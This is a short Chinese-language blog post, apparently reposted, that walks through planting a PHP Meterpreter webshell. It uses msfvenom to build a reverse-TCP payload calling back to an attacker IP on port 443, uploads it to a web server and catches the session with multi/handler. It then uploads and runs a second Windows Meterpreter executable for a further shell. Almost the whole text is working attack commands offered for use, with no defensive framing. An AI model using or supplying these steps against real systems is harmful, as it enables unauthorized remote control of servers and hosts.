php Meterpreter Webshell

1. msfvenom -p  php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php
2. 上传a.php到web服务器
3. 启动msfconsole
4. use multi/handler
5. set  LHOST Attacker's_IP
6. set LPORT  443
7. set payload php/meterpreter/reverse_tcp
8. exploit
9. 攻击者使用浏览器访问上传的文件
10.此时,攻击者可以得到一个meterpreter session
11.打开一个终端,然后再创建一个payload
msfpayload windows/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=4444
X>payload.exe
12. 在session中使用upload命令将payload.exe上传
13. 然后在第二个终端中运行msfconsole,设置multi/handler,paylaod为'windows/meterpreter/reverse_tcp
14. 在第一个终端中运行execute -f payload.exe
这时可以在第二个终端中获得一个meterpreter session

猜你喜欢

转载自j4s0nh4ck.iteye.com/blog/2156831